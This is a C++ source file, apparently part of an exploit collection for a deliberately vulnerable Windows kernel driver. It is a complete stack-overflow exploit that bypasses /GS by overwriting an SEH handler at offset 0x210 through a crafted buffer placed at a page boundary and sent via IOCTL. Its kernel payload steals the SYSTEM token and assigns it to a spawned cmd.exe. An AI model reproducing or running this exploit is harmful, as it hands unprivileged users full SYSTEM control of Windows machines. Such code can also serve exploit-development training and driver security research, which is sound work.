StackOverflowGS.cpp

#include <ntstatus.h>
#include <cassert>
#include "StackOverflowGS.h"
#include "payloads.h"


typeZwClose                 ZwClose;
typeZwOpenProcess           ZwOpenProcess;
typeZwDuplicateToken        ZwDuplicateToken;
typeZwOpenProcessToken      ZwOpenProcessToken;
typeZwTerminateProcess		ZwTerminateProcess;
typeObDerefenceObject		ObDereferenceObject;
typePsGetCurrentProcess     PsGetCurrentProcess;
typeZwSetInformationProcess ZwSetInformationProcess;
typePsReferencePrimaryToken	PsReferencePrimaryToken;
typePsLookupProcessByProcessId PsLookupProcessByProcessId;

DWORD g_dwProcessIdToElevate;


template<typename apiType>
bool resolveApi(DWORD kernelBase, HINSTANCE hKernel, const string& apiName, apiType& apiPtr)
{
	static size_t counter = 0;
	const wstring apiNameWide = wstring(apiName.begin(), apiName.end());
	
	apiPtr = reinterpret_cast<apiType>(GetProcAddress(
		hKernel, 
		apiName.c_str()
	));
	if(!apiPtr) {
		wcerr << L"[!] Could not get address of: (" << apiNameWide
			<< L"). Error: " << getErrorString(GetLastError()) << endl;
		return false;
	}
	
	apiPtr = reinterpret_cast<apiType>(
		(reinterpret_cast<DWORD>(apiPtr) - reinterpret_cast<DWORD>(hKernel)) + kernelBase
	);
	
	wcout << L"\tAPI[ " << counter << L"]: " << apiNameWide 
		<< L" located at: 0x" << setw(8) << setfill(L'0') 
		<< reinterpret_cast<DWORD>(apiPtr) << endl;
	
	counter ++;
	return true;
}

bool
ExploitStackOverflowGS::resolveKernelApis()
{
	ULONG kernelModuleBase;
	DWORD kernelModuleSize;
	wstring kernelModuleName;
	
	tie(kernelModuleBase, kernelModuleSize, kernelModuleName) = driver.GetKernelModuleInfos();
	
	HINSTANCE hKernel = LoadLibraryExW(
		kernelModuleName.c_str(),
		NULL,
		DONT_RESOLVE_DLL_REFERENCES
	);
	if(!hKernel) {
		wcerr << L"[!] Could not load kernel's library (" << kernelModuleName << L"). Error: "
			<< getErrorString(GetLastError()) << endl;
		return false;
 	}
 	
 	wcout << L"[+] Resolving kernel (" << kernelModuleName << L") APIs..." << endl;
	
	if(!resolveApi(kernelModuleBase, hKernel, "ZwClose", ZwClose)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "ZwOpenProcess", ZwOpenProcess)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "ZwDuplicateToken", ZwDuplicateToken)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "ZwOpenProcessToken", ZwOpenProcessToken)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "ZwTerminateProcess", ZwTerminateProcess)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "PsGetCurrentProcess", PsGetCurrentProcess)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "ObDereferenceObject", ObDereferenceObject)) return false;	
	if(!resolveApi(kernelModuleBase, hKernel, "ZwSetInformationProcess", ZwSetInformationProcess)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "PsReferencePrimaryToken", PsReferencePrimaryToken)) return false;
	if(!resolveApi(kernelModuleBase, hKernel, "PsLookupProcessByProcessId", PsLookupProcessByProcessId)) return false;
		
	return true;
}

NTSTATUS 
ExploitStackOverflowGS::ElevatePrivilegesPayload()
{
#ifdef USE_INT_3_IN_SHELLCODE
	asm("int $3");
#endif
	
	OBJECT_ATTRIBUTES ObjectAttributes;
	NTSTATUS ntStatus = STATUS_SUCCESS;
	PEPROCESS TargetProcess = NULL;
	HANDLE hSystem = NULL;
	HANDLE hSystemToken = NULL;
	HANDLE hNewPrivilegedToken = NULL;
	HANDLE hTargetProcess = NULL;
	PROCESS_ACCESS_TOKEN AccessToken = { 0 };
	CLIENT_ID SystemClientId = {
		reinterpret_cast<HANDLE>(4),		// SYSTEM process id (PID)
		NULL
	};
	
	CLIENT_ID TargetClientId = {
		reinterpret_cast<HANDLE>(g_dwProcessIdToElevate),
		NULL
	};
	
	InitializeObjectAttributes(
		&ObjectAttributes, 
		NULL, 
		0, 
		NULL, 
		NULL
	);
	
	// Step 1: Open SYSTEM's process
	ntStatus = ZwOpenProcess(
		&hSystem, 
		GENERIC_ALL, 
		&ObjectAttributes, 
		&SystemClientId
	);
	
	if(!NT_SUCCESS(ntStatus)) {
		goto err;
	}
	
	// Step 2: Get SYSTEM's process Token
	ntStatus = ZwOpenProcessToken(
		hSystem, 
		GENERIC_ALL, 
		&hSystemToken
	);
	
	if(!NT_SUCCESS(ntStatus)) {
		goto err;
	}
	
	InitializeObjectAttributes(
		&ObjectAttributes, 
		NULL, 
		0, 
		NULL, 
		NULL
	);
	
	// Step 3: Duplicate SYSTEM's process Token
	ntStatus = ZwDuplicateToken(
		hSystemToken, 
		TOKEN_ALL_ACCESS, 
		&ObjectAttributes, 
		TRUE, 
		TokenPrimary, 
		&hNewPrivilegedToken
	);
	
	if(!NT_SUCCESS(ntStatus)) {
		goto err;
	}
	
	InitializeObjectAttributes(
		&ObjectAttributes, 
		NULL, 
		0, 
		NULL, 
		NULL
	);
	
	// Step 4: Open target process
	ntStatus = ZwOpenProcess(
		&hTargetProcess, 
		GENERIC_ALL, 
		&ObjectAttributes, 
		&TargetClientId
	);
	
	if(!NT_SUCCESS(ntStatus)) {
		goto err;
	}

	AccessToken.Token = hNewPrivilegedToken;
	
#ifdef USE_INT_3_IN_SHELLCODE
	asm("int $3");
#endif

	// Fix the issue with PrimaryTokenFrozen
	ntStatus = PsLookupProcessByProcessId(
		reinterpret_cast<HANDLE>(g_dwProcessIdToElevate),
		&TargetProcess
	);
	
	if(!NT_SUCCESS(ntStatus)) {
		goto err;
	}
		
	TargetProcess->PrimaryTokenFrozen = 0;
	
	ObDereferenceObject(TargetProcess);
	
#ifdef USE_INT_3_IN_SHELLCODE
	asm("int $3");
#endif

	// Step 5: Set duplicated system's token to the target process' token
	ntStatus = ZwSetInformationProcess(
		hTargetProcess,
		ProcessAccessToken,
		&AccessToken,
		sizeof(PROCESS_ACCESS_TOKEN)
	);
	
err:
	if(hNewPrivilegedToken != NULL) {
		ZwClose(hNewPrivilegedToken);
	}
	
	if(hTargetProcess != NULL) {
		ZwClose(hTargetProcess);
	}
	
	if(hSystem != NULL) {
		ZwClose(hSystem);
	}
	
	if(hSystemToken != NULL) {
		ZwClose(hSystemToken);
	}

#ifdef USE_INT_3_IN_SHELLCODE
	asm("int $3");
#endif	
	ZwTerminateProcess(
		GetCurrentProcess(),
		STATUS_SUCCESS
	);
	
	return ntStatus;
}


bool 
ExploitStackOverflowGS::exploit() {
	
	static const size_t Page_Size = 4096;
	static const size_t SEH_Overwrite_Offset = 0x210;
	
	if(!resolveKernelApis()) {
		return false;
	}
	
	assert(ZwClose != nullptr);
	
	auto shellcodePointer = reinterpret_cast<void*>(
		ExploitStackOverflowGS::ElevatePrivilegesPayload
	);
	
	wcout << L"[+] The Kernel shellcode is located at: " << setw(8) 
			<< setfill(L'0') << hex << shellcodePointer << endl;
	
	wcout << L"[+] Step 1: Create anonymous file mapping" << endl;	
	
	HANDLE mapping = CreateFileMapping(
		INVALID_HANDLE_VALUE,
		NULL,
		PAGE_EXECUTE_READWRITE,
		0,
		Page_Size,
		NULL
	);
	
	if(!mapping) {
		wcerr << L"[!] Could not create anonymous file mapping! Error: 0x" << hex 
			<< setw(8) << setfill(L'0') << GetLastError() << endl;
		return false;
	}
	
	wcout << L"[+] Step 2: Mapping view of file" << endl;	
	
	LPVOID mappedRegion = MapViewOfFile(
		mapping,
		FILE_MAP_ALL_ACCESS,
		0,
		0,
		Page_Size
	);
	
	if(!mappedRegion) {
		wcerr << L"[!] Could not map view of file! Error: 0x" << hex 
			<< setw(8) << setfill(L'0') << GetLastError() << endl;
		CloseHandle(mapping);
		return false;
	}
	
	PVOID bufferPointer = reinterpret_cast<PVOID>(
		reinterpret_cast<ULONG>(mappedRegion) + 
		(static_cast<ULONG>(Page_Size - SEH_Overwrite_Offset - 4))
	);
	
	wcout << L"\tFile mapping region at: " << hex << setw(8) << setfill(L'0') << mappedRegion 
		<< L"\n\tAttacker prepared buffer at: " << hex << setw(8) << setfill(L'0') 
		<< bufferPointer << endl; 
		
	memset(bufferPointer, 'A', SEH_Overwrite_Offset);
	
	*(reinterpret_cast<DWORD*>(
		&reinterpret_cast<unsigned char*>(bufferPointer)[SEH_Overwrite_Offset]
	)) = reinterpret_cast<DWORD>(shellcodePointer);
	
	g_dwProcessIdToElevate = spawnProcessAndGetPID(L"C:\\Windows\\system32\\cmd.exe");
	if(!g_dwProcessIdToElevate) {
		return false;
	}
	
	wcout << L"[+] The process' PID to be eleveated: " << dec << g_dwProcessIdToElevate << endl;
	
	Sleep(1000);
	
	bool ret = driver.SendIOCTL (
		ExploitStackOverflowGS::Ioctl_Code,
		bufferPointer,
		SEH_Overwrite_Offset + 8
	);
	
	CloseHandle(mapping);
	return ret;
}